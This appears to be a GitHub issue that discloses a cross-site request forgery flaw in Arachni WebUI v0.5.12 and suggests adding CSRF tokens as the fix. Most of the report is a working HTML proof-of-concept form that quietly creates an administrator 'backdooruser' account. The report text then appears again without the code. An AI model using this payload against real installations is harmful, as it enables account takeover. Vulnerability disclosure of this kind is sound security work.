Open dfezza opened 4 years ago
Vulnerable components: Arachni c1.5.1 - WebUI v0.5.12
Steps:
Cross-Site Request Forgery (CSRF) PoC to add a backdoor-account:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:9292/users" method="POST"> <input type="hidden" name="utf8" value="✓" /> <input type="hidden" name="authenticity_token" value="MjWHU198l/sSd/2IKpPJWDuv1WJziw90AuNHj3pMrO/uyidswqmseuhavNrwsuHp0UfSs5uC8IEtaq3TxHflWg==" /> <input type="hidden" name="user[name]" value="backdooruser" /> <input type="hidden" name="user[password]" value="backdooruser" /> <input type="hidden" name="user[email]" value="backdooruser@backdooruser.com" /> <input type="hidden" name="user[password_confirmation]" value="backdooruser" /> <input type="hidden" name="user[role_ids][]" value="1" /> <input type="hidden" name="user[role_ids][]" value="" /> <input type="hidden" name="commit" value="Create User" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Solution: Add a CSRF-token to the post forms.
Vulnerable components: Arachni c1.5.1 - WebUI v0.5.12
Steps:
Cross-Site Request Forgery (CSRF) PoC to add a backdoor-account:
Solution: Add a CSRF-token to the post forms.